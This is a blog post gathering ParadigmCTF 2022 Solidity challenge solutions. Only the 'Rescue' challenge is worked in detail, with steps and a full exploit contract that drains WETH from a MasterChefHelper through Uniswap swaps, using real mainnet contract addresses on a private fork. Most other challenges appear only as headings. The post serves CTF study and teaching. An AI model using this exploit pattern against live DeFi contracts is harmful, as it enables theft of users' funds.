ParadigmCTF 2022 solutions

Solidity

Blockchain

08/22/2022


A CTF (Capture the Flag) contest consists of a list of challenges in which the participants try to exploit a deliberately vulnerable system. This blog post collects some interesting solutions proposed by different experts who solved the challenges of ParadigmCTF 2022. Though there are multiple articles and posts explaining solutions to individual problems, I wanted to create an article that serves as a single point of reference for the solutions to the Solidity challenges. There were also some challenges involving Solana (Rust) and Starknet (Cairo), whose solutions are not covered in this post. Let's get to it!

Challenge structure:

Each challenge will have the following:

  • Challenge title
  • Author name
  • Tags
  • Description of the challenge
  • IP address of the server for that challenge (Access)
  • Challenge Ticket
  • Challenge Resources

Once connected to the server, there are three choices:

  • Launch new instance: Used to deploy a new private blockchain and challenge contracts
  • Kill instance: Stop the running instance, if any
  • Get flag: Returns the flag for the challenge if solved.

The ticket is like a passcode that we need to submit to execute any of the above three choices.

Each challenge has a Setup contract that is deployed when a new instance is launched. The Setup contract exposes an isSolved() method that returns a bool: true once the challenge has been solved. The server calls the same method to validate the solution when we choose the Get flag option.

I have added reference links to detailed writeups for some of the challenges, as they are more likely to help readers understand the approach taken by those who actually solved them! All links were active when this article was written. Please let me know if any of them are broken :)

Challenges:

1. Random:

This is an entry-level challenge: it is solved by simply calling the solve() method with 4.

2. Rescue:

This challenge requires the user to drain the WETH tokens from the MasterChefHelper contract, which uses Uniswap's V2 router contract for swapping and for adding liquidity.

The solution would look like:

  1. Deposit some ETH, say 20, into the WETH9 contract to get WETH tokens back.
  2. Use the poolInfo method of the MasterChef contract to get the LP token of a pool. For poolId 1, the LP token is the WETH/USDC pair.
  3. Buy 10 WETH worth of USDC through the UniswapV2 router and send it to the MasterChefHelper contract.
  4. The MasterChefHelper contract now holds 10 WETH and 10 WETH worth of USDC.
  5. Buy 10 WETH worth of USDT through the UniswapV2 router and approve the MasterChefHelper contract to spend it.
  6. Call the MasterChefHelper contract's swap-and-add-liquidity method with poolId 1, tokenIn as the USDT address and amountIn as the USDT just bought.

The MasterChefHelper contract swaps half of the USDT into USDC and the other half into WETH (about 5 WETH worth of each), so it now holds about 15 WETH worth of tokens on both sides (WETH and USDC). Its _addLiquidity method then deposits the contract's entire balance of both tokens into the pool, which leaves the MasterChefHelper contract's WETH balance at zero.

One caveat: the router only takes matching amounts at the pool's current ratio, so whichever side is worth less is consumed in full and the other side leaves a remainder. The USDC sent in step 3 should therefore be slightly more than 10 WETH worth, so that WETH is the side that gets used up completely; otherwise some WETH dust stays in the helper and isSolved() remains false.
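The whole sequence above as a single exploit contract, written here as an added example rather than taken from the challenge or from any published solution. It assumes the instance is a mainnet fork, as the fixed mainnet addresses the challenge contracts use imply: the WETH, Uniswap V2 router and SushiSwap MasterChef addresses below are the real mainnet ones. The IMasterChefHelper interface, in particular the name and parameter order of swapTokenForPoolToken, is an assumption reconstructed from the behaviour described above and should be checked against the challenge source. The example generalises slightly beyond the steps: it derives the pair's non-WETH token from poolInfo and accepts any third token as tokenIn, not only USDT.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;

// Added example, not the challenge's own code. Addresses are the real mainnet
// ones; IMasterChefHelper is an ASSUMED reconstruction of the challenge interface.

interface IWETH {
    function deposit() external payable;
    function balanceOf(address owner) external view returns (uint256);
}

interface IUniswapV2Router02 {
    function swapExactTokensForTokens(uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline) external returns (uint256[] memory amounts);
}

interface IUniswapV2Pair {
    function token0() external view returns (address);
    function token1() external view returns (address);
}

interface IMasterChef {
    // SushiSwap MasterChef: (lpToken, allocPoint, lastRewardBlock, accSushiPerShare)
    function poolInfo(uint256 pid) external view returns (address lpToken, uint256, uint256, uint256);
}

interface IMasterChefHelper {
    // Assumed signature: swaps amountIn/2 of tokenIn into each side of the pool's
    // pair, then adds the helper's ENTIRE balance of both tokens as liquidity.
    function swapTokenForPoolToken(uint256 poolId, address tokenIn, uint256 amountIn, uint256 minAmountOut) external;
}

contract RescueExploit {
    IWETH constant WETH = IWETH(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
    IUniswapV2Router02 constant ROUTER = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
    IMasterChef constant MASTERCHEF = IMasterChef(0xc2EdaD668740f1aA35E4D8f227fB8E17dcA888Cd);

    // helper: the MasterChefHelper from the challenge's Setup; poolId: a pool whose
    // pair contains WETH (1 = USDC/WETH); tokenIn: a third token such as USDT.
    // msg.value funds both legs; 21 ETH covers the 11 + 10 split used here.
    function drain(IMasterChefHelper helper, uint256 poolId, address tokenIn) external payable {
        uint256 sideLeg = 11 ether; // WETH swapped into the pair's non-WETH token
        uint256 inLeg = 10 ether;   // WETH swapped into tokenIn
        require(msg.value >= sideLeg + inLeg, "need more ETH");

        // Find the non-WETH side of the pool's pair.
        (address lp,,,) = MASTERCHEF.poolInfo(poolId);
        address t0 = IUniswapV2Pair(lp).token0();
        address t1 = IUniswapV2Pair(lp).token1();
        require(t0 == address(WETH) || t1 == address(WETH), "pool has no WETH side");
        address sideToken = t0 == address(WETH) ? t1 : t0;
        require(tokenIn != sideToken && tokenIn != address(WETH), "tokenIn must be a third token");

        // 1. Wrap ETH and let the router pull it.
        WETH.deposit{value: msg.value}();
        _safeApprove(address(WETH), address(ROUTER), type(uint256).max);

        // 2. Buy the pair's other token straight into the helper. This leg is
        //    deliberately larger than the helper's 10 WETH: after the helper's
        //    own swaps the non-WETH side must be worth MORE than the WETH side,
        //    so addLiquidity uses the full WETH balance and only a matching
        //    amount of the other token. Otherwise WETH dust would remain.
        _swap(address(WETH), sideToken, sideLeg, address(helper));

        // 3. Buy tokenIn for ourselves and approve the helper to pull it.
        uint256 got = _swap(address(WETH), tokenIn, inLeg, address(this));
        _safeApprove(tokenIn, address(helper), got);

        // 4. The helper swaps half of tokenIn into each side of the pair, then
        //    deposits everything it holds, including the stranded WETH.
        helper.swapTokenForPoolToken(poolId, tokenIn, got, 0);

        // Same condition the challenge's isSolved() checks.
        require(WETH.balanceOf(address(helper)) == 0, "helper still holds WETH");
    }

    function _swap(address from, address to, uint256 amountIn, address recipient) internal returns (uint256) {
        address[] memory path = new address[](2);
        path[0] = from;
        path[1] = to;
        // amountOutMin = 0 is acceptable on a private fork, never on a live chain.
        uint256[] memory amounts = ROUTER.swapExactTokensForTokens(amountIn, 0, path, recipient, block.timestamp);
        return amounts[1];
    }

    // Tether's approve() returns no value, so calling it through an interface
    // declared `returns (bool)` reverts on the return-data check. A raw call that
    // accepts empty return data or a decoded `true` works for both kinds of token.
    function _safeApprove(address token, address spender, uint256 amount) internal {
        (bool ok, bytes memory data) = token.call(abi.encodeWithSignature("approve(address,uint256)", spender, amount));
        require(ok && (data.length == 0 || abi.decode(data, (bool))), "approve failed");
    }
}
```

Deploy it on the challenge instance and call drain{value: 21 ether}(helperAddress, 1, usdtAddress) from the player account; the final require is the same condition isSolved() checks, so a successful transaction means the flag can be collected. The raw-call approve matters because Tether's approve() returns nothing, which makes a call through a standard `returns (bool)` interface revert; Tether also rejects a non-zero approve while an allowance is already non-zero, which is harmless here only because the contract is fresh.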

More detailed writeup:

3. MerkleDrop:

4. Vanity:

5. Trapdooor:

6. Electric Sheep:

7. Lockbox:

8. Trapdoooor:

9. Hint Finance:

10. Just In Time:


Soooon:

  • Stealing Sats
  • Fun Reversing Challenge
  • SourceCode